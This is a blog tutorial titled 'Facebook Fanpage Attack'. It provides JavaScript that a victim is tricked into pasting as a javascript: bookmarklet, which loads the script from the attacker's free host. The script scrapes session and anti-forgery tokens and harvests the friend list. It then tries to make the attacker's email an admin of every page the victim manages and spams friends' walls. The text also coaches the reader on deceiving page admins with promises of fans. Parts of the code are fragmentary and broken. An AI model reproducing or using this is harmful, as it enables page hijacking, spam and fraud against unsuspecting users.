Header Ads

Facebook Fanpage Attack

Now let’s start the tutorial. First of all we will need to setup an exploit and a website to host the exploit. If you already have a hosting then it’s great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.

Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.

Things we shall need:

1. Facebook page hacking exploit.

2. A free hosting.

3. A key or script to run that "Facebook page hacking exploit.".

4. Your Facebook email id.

5. Brain (A bit)

Step 1:

Copy the Below Code and Save It In A Notepad....

Search For Inferno19@gmail.com in the Code Below & Replace It With Your Facebook EMAIL ID

//These are to be posted as status messages

txt = "Hey See what i got!";

txtee = "Hey See what i got!";

alert("Please wait 10-15 seconds, that we can analyze your friends to boost pages fans! Then click 'OK'to continue!");

with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {


//comp = z.match(/name="UIComposer_STATE_PIC_OUTSIDE" value="([\d\w]+)"/i)[1];

// comp = x.responseText.match(/name="UIComposer_STATE_PIC_OUTSIDE" id="([\d\w]+)"/i)[1];

form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];

dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];

pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];

with(xx = new XMLHttpRequest())

open("GET", "/ajax/browser/friends/?uid=" +

document.cookie.match(/c_user=(\d+)/)[1] +


onreadystatechange = function () {

//extracts list of friends

if (xx.readyState == 4 && xx.status == 200) {

m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");

//facebook returns list of friends images of the form of three numbers separated by _,

//the above regular expression extracts out the middle of the two

//(which infact is the userID of friend)

i = 0;


t = setInterval(function () {

if (i >= llimit )

return;//it seems the limit is 25 posts per 2 seconds on facebook (to be counted as bot)

if(i == 0) {//do it only once

with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),

setRequestHeader("X-Requested-With", null),

setRequestHeader("X-Requested", null),

onreadystatechange = function() {

if(ddddd.readyState == 4 && ddddd.status == 200) {

llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); len =llm.length;



with(xxxcxxx = new XMLHttpRequest()) open("POST", "/pages/edit/?id="+llm[j].replace(/\\"id\\":/i, "")+"&sk=admin"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("post_form_id="+pfid+"&fb_dtsg="+dt+"&fbpage_id="+llm[j].replace(/\\"id\\":/i, "")+


//I am not very sure on this one but it seems it adds as admin of all pages the user holds



}, send(null); //end of function to change the admins

// this one collects cookie as well as the personalized status update email address

// (a photo sent to that address is posted on the wall directly)


//following code does status update

//the code writes message represented by txt and txtee alternately on the wall of friends.

//txt and txtee are same though (may be author's mistake)



with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt +

"&target_id=" + m[Math.floor(Math.random() * m.length)] +

//m is an array of id of friends (was created early in the script exec), choose a random friend

"&composer_id=" +

"&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" +form + "&fb_dtsg=" + dt +

//comp, form, dt are (probably) XSRF prevention tokens





with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee +

"&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id="+

"&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt +



i += 1;

}, 2000);// 2000 milli-sec window, after which the script is executed again


}, send(null);


}, send(null);

Now Save the Notepad File as inferno19.js

Step 2:

Create a Free Hosting Account Somewhere on a Free Host & Upload Your jhakaas.js File There ... You Will Get a Link

For Example: http://abc.yourfilehost.com/inferno19.js

Step 3: The Viral Code Creation

javascript:(a = (b = document).createElement(“script”)).src = “http://abc.yourfilehost.com/inferno19.js“, b.body.appendChild(a); void(0)

Now You Just Have To Send This Code To The Admin Of The Page And Tell Him to Run it On The Page.. It’s Up to You How You Fool Him ...

Hint: You Can Give Him A Greed That After Running This Code He Will Get 1000's Of Fans or Something Like That...
Powered by Blogger.